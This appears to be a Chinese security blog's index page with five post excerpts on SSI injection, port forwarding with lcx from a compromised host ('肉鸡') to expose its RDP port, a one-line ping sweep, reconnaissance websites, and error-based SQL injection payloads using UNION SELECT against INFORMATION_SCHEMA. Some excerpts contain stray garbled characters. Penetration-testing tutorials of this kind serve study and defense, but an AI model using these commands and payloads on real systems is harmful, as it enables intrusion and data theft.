摘要：0x01 什么是SSI和SSI注入 SSI是英文Server Side Includes的缩写，翻译成中文就是服务器端包含的意思。从技术角度上说，SSI就是在HTML文件中，可以通过注释行调用的命令或指针。SSI具有强大的功能，只要使用一条简单的SSI 命令就可以实现整个网站的内容更新，时间和日期的 阅读全文

摘要：端口转发 一、lcx 的使用 1. 肉鸡上执行：lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如：lcx.exe -slave xxx.xxx.xxx.xxx 10001 127.0.0.1 3389 意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx 阅读全文

摘要：内网无工具扫描 一条 cmd 命令解决： for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" ping 整个 c 段，只输出有响应的主机。 % H" g% Q+ _6 q- P7 t 更变态的： 4 o4 g8 阅读全文

摘要：whois查询： http://tool.chinaz.com/ https://whois.aizhan.com/ https://x.threatbook.cn/ http://site.ip138.com/ 子域信息收集： https://phpinfo.me/domain/ 端口扫描： nm 阅读全文

摘要：1.基于字符型报错注入 报字段数： ' order by 3 --+ // “+” 代表空格 ' union select 1,2,3 --+ ' UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA 阅读全文